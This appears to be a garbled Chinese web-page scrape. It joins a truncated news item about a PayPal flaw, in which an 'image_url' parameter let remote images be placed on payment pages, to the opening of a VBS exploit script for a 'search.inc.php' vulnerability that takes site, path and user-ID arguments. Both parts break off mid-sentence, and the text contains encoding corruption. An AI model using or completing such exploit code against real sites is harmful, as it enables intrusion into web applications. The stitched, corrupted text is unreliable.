貝寶(PayPal)解決了一個(gè)可被黑客用來(lái)向支付頁(yè)面插入惡意圖像的漏洞問(wèn)題。
安全研究員Aditya K Sood發(fā)現(xiàn)貝寶用戶設(shè)置的支付頁(yè)面的URL中包含一個(gè)名為“image_url”的參數(shù)。這個(gè)參數(shù)的值可被指向一張托管在遠(yuǎn)程服務(wù)
以下是search.inc.php 文件漏洞利用代碼VBS版 代碼如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) str